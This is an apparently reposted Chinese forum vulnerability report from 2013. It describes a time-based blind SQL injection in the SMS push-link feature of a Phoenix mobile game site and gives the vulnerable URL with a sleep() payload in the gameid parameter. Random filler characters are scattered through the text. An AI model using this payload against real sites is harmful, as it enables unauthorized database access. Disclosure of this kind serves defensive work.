简要描述:
1 H+ [) g% N2 \1 ^凤凰手机游戏网,在填写手机号码发送push连接的地方存在sql盲注漏洞。
; \6 _2 t1 W8 {( S6 V! A
3 I- H* b% G5 ^: {3 V2 t详细说明:
0 C( E3 K4 E9 E$ G+ m( p+ d; D存在SQL盲注url:; G* b8 b8 m, v. `
fenghuang/game/game_send_sms.jsp?gameid=130221346000%27%20and%20sleep%282%29%3d%27&mo=1
! x6 Y1 w% K/ \& d _; Ahttp://www.myhack58.com/Article/UploadPic/2013-4/2013411254849748.png7 Q+ b& y3 K4 K" H( _+ i0 \& A
http://www.myhack58.com/Article/UploadPic/2013-4/20134112545369314.png
/ X# f7 ~2 d9 ? P- Xhttp://www.myhack58.com/Article/UploadPic/2013-4/20134112565766695.jpg, j8 {' z( Q1 j- f9 N9 _+ Q5 c
9 O9 [/ y0 [4 q; r能看到mysql系统数据库,看来user权限应该很高的。。 | 
发表于 2013-4-4 17:34:29
收藏
支持
反对